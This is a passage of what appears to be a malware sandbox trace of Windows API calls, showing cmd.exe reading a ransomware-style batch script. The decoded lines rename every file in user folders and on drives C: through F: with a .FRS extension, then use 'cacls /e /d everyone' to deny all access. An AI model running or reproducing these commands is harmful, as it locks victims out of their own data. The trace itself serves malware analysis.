| out: lpDistanceToMoveHigh=0x0) returned 0x62 [0122.788] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.789] GetFileType (hFile=0x260) returned 0x1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0122.789] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0122.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0122.789] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.789] GetFileType (hFile=0x260) returned 0x1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0122.789] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0122.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0122.789] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.789] GetFileType (hFile=0x260) returned 0x1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0122.789] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0122.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0122.789] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.789] GetFileType (hFile=0x260) returned 0x1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0122.789] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0122.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0122.789] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.789] GetFileType (hFile=0x260) returned 0x1 [0122.789] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0122.789] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0122.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0122.790] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.790] GetFileType (hFile=0x260) returned 0x1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0122.790] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0122.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0122.790] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.790] GetFileType (hFile=0x260) returned 0x1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0122.790] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0122.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0122.790] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.790] GetFileType (hFile=0x260) returned 0x1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0122.790] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0122.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0122.790] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.790] GetFileType (hFile=0x260) returned 0x1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0122.790] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.790] SetFilePointer (in: hFile=0x260, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0122.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0122.791] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.791] GetFileType (hFile=0x260) returned 0x1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0122.791] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0122.791] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0122.791] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.791] GetFileType (hFile=0x260) returned 0x1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0122.791] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0122.791] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0122.791] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.791] GetFileType (hFile=0x260) returned 0x1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0122.791] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0122.791] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0122.791] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.791] GetFileType (hFile=0x260) returned 0x1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0122.791] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0122.791] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0122.791] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0122.791] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.791] GetFileType (hFile=0x260) returned 0x1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0122.792] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0122.792] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0122.792] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.792] GetFileType (hFile=0x260) returned 0x1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0122.792] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0122.792] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0122.792] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.792] GetFileType (hFile=0x260) returned 0x1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0122.792] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0122.792] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0122.792] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.792] GetFileType (hFile=0x260) returned 0x1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0122.792] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0122.792] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0122.792] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.792] GetFileType (hFile=0x260) returned 0x1 [0122.792] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0122.792] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0122.793] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0122.793] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.793] GetFileType (hFile=0x260) returned 0x1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0122.793] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0122.793] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0122.793] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.793] GetFileType (hFile=0x260) returned 0x1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0122.793] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0122.793] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0122.793] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.793] GetFileType (hFile=0x260) returned 0x1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0122.793] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0122.793] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0122.793] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.793] GetFileType (hFile=0x260) returned 0x1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0122.793] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.793] SetFilePointer (in: hFile=0x260, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0122.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0122.794] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.794] GetFileType (hFile=0x260) returned 0x1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0122.794] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0122.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0122.794] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.794] GetFileType (hFile=0x260) returned 0x1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0122.794] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 